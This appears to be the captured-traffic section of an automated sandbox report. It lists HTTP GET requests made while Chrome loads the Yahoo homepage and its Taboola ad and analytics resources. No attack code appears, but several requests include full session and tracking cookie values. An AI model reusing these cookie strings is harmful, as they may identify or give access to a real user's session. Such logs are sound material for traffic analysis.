Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/uUAR2bOq_t6VJz1nT5AULg--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/usa_today_sports_articles_558/4a196f0fdaa67a9fca3ea52c340239cd.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/JjtDc3_w.qhGQrf4A_jcxA--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/miami_herald_mcclatchy_975/e866e6133d9de1f7a90c43f44013066c.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-template-1.4.3-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/ZrkpfMFDMT6.TViJfgbzxA--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/ap.org/5297d6de4533c99afa9d186dfe51efc1.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-action-1.8.1-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-native-da-1.0.5-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-menu-1.3.5-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/fp/js/react-wafer-stream.custom.modern.1ed4fe71b1fc647ddbf37a7050944309.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/PpsenWo6Y0lPNzxwf.B21w--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/billboard_547/b0d8c85d9f4a0d173b86d5606d37a033.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-sticky-1.2.6-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/8Sig4ocDKNR5dhitUx31wg--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/in_touch_weekly_336/3222bbad9324529b020253049d71963d.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tag/opus.js HTTP/1.1Host: opus.analytics.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /static/22/228515c2-9c18-491a-a142-95df43dd9630.css HTTP/1.1Host: cdn.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /static/impl/css/GTAmerica_2024-03-27.css HTTP/1.1Host: cdn.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /yahoo-home/trc/3/json?llvl=2&tim=15%3A13%3A43.488&lti=trecs&pubit=n&t=1&data=%7B%22cmps%22%3A0%2C%22ga%22%3Atrue%2C%22gwto%22%3Atrue%2C%22cex%22%3A%22false%22%2C%22id%22%3A%2218206%22%2C%22sd%22%3A%22%22%2C%22ui%22%3A%22%22%2C%22ii%22%3A%22_homepage_%22%2C%22it%22%3A%22home%22%2C%22vi%22%3A1728414823488%2C%22cv%22%3A%2220241006-3-RELEASE%22%2C%22uiv%22%3A%22default%22%2C%22u%22%3A%22https%3A%2F%2Fwww.yahoo.com%2F%22%2C%22qs%22%3A%22%22%2C%22bv%22%3A%220%22%2C%22btv%22%3A%220%22%2C%22ul%22%3A%5B%22en-US%22%2C%22en%22%5D%2C%22cos%22%3A%223g%22%2C%22e%22%3A%22https%3A%2F%2Fortkn.lovationyme.com%2F%22%2C%22bu%22%3A%22https%3A%2F%2Fwww.yahoo.com%2F%22%2C%22vpi%22%3A%22%2F%22%2C%22bad%22%3A-1%2C%22sw%22%3A1280%2C%22sh%22%3A984%2C%22bw%22%3A1280%2C%22bh%22%3A907%2C%22dw%22%3A1263%2C%22dh%22%3A5371%2C%22sde%22%3A%221.000%22%2C%22lt%22%3A%22trecs%22%2C%22nsid%22%3A%22yahooweb-network%22%2C%22pblob%22%3A%22cobrand%3Anone%3Bcolo%3Abf1%3Bdevice%3Adesktop%3Blang%3Aen-US%3Blu%3A0%3Bpt%3Ahome%3Bregion%3AUS%3Bsite%3Afp%3Bver%3Amegastrm%7C%7C2023538075%7C%7C%7C%7Crocket_GA_desk_test-3-v1%2Cseamless%7C%22%2C%22r%22%3A%5B%7B%22li%22%3A%22rbox-h2m%22%2C%22uip%22%3A%22taboola-stream-2%22%2C%22orig_uip%22%3A%22taboola-stream-2%22%2C%22s%22%3A1%2C%22uim%22%3A%22stream-d%3Apub%3Dyahooweb-network%3Aabp%3D0%22%2C%22cd%22%3A1079.92%2C%22mw%22%3A899%7D%2C%7B%22li%22%3A%22rbox-h2m%22%2C%22uip%22%3A%22taboola-stream-8%22%2C%22orig_uip%22%3A%22taboola-stream-8%22%2C%22s%22%3A1%2C%22uim%22%3A%22stream-d%3Apub%3Dyahooweb-network%3Aabp%3D0%22%2C%22cd%22%3A1900.91%2C%22mw%22%3A899%7D%5D%2C%22uad%22%3A%7B%22mobile%22%3Afalse%2C%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0.0%22%2C%22uaFullVersion%22%3A%22117.0.5938.132%22%7D%2C%22cacheKey%22%3A%22home%3D_homepage_%2Ctaboola-stream-2%3Dstream-d%3Apub%3Dyahooweb-network%3Aabp%3D0%2Ctaboola-stream-8%3Dstream-d%3Apub%3Dyahooweb-network%3Aabp%3D0%22%2C%22_cn%22%3A%22tions_1%22%2C%22lbt%22%3A1728208881940%2C%22wc%22%3Atrue%2C%22pa%22%3A%7B%22en%22%3Atrue%2C%22su%22%3Atrue%7D%7D HTTP/1.1Host: trc.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: taboola_session_id=v2_4e609492ff55b48084743843e072bd5f_2491f7ac-bac0-439b-ae60-c06d9130e657-tuctdff09e9_1728414825_1728414825_CIi3jgYQm9teGMDotOymMiABKAEw4QE4kaQOQPzYD0iry9kDUOoEWABgAGiOuMvY8NrPu1twAYABAA; t_pid=2491f7ac-bac0-439b-ae60-c06d9130e657-tuctdff09e9
Source: global trafficHTTP traffic detected: GET /static/6b/6b91a1bc-8217-4d34-9774-28dc8fd0cd05.css HTTP/1.1Host: cdn.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /static/impl/css/yahoo_cr3_beta.css HTTP/1.1Host: cdn.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/uUAR2bOq_t6VJz1nT5AULg--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/usa_today_sports_articles_558/4a196f0fdaa67a9fca3ea52c340239cd.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/JjtDc3_w.qhGQrf4A_jcxA--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/miami_herald_mcclatchy_975/e866e6133d9de1f7a90c43f44013066c.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/c/553e048.caas-news_web.min.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ybar/exp.json HTTP/1.1Host: edge-mcdn.secure.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.yahoo.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/8Sig4ocDKNR5dhitUx31wg--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/in_touch_weekly_336/3222bbad9324529b020253049d71963d.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/PpsenWo6Y0lPNzxwf.B21w--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/billboard_547/b0d8c85d9f4a0d173b86d5606d37a033.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/ZrkpfMFDMT6.TViJfgbzxA--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/ap.org/5297d6de4533c99afa9d186dfe51efc1.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /libtrc/impl.20241006-3-RELEASE.js HTTP/1.1Host: cdn.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /yahooweb-network/load.js HTTP/1.1Host: pm-widget.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /aaq/notifications/js/sh-5.17.91.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/hc/homepage-pwa-defer-1.1.6.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/vzm/cs_1.6.6.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/f10d509c/d1ccw66oyq8ex2.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ybar/exp.json HTTP/1.1Host: edge-mcdn.secure.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /du/ay/wnsrvbjmeprtfrnfx.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/prebid/prebid-2.0.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /yahooweb-network/load.js HTTP/1.1Host: pm-widget.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /scripts/eid.es5.js HTTP/1.1Host: cdn.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/vzm/cs_1.6.6.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pv/static/img/voiceSearch1x-1620383531565.min.png HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-autocomplete-1.31.8-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
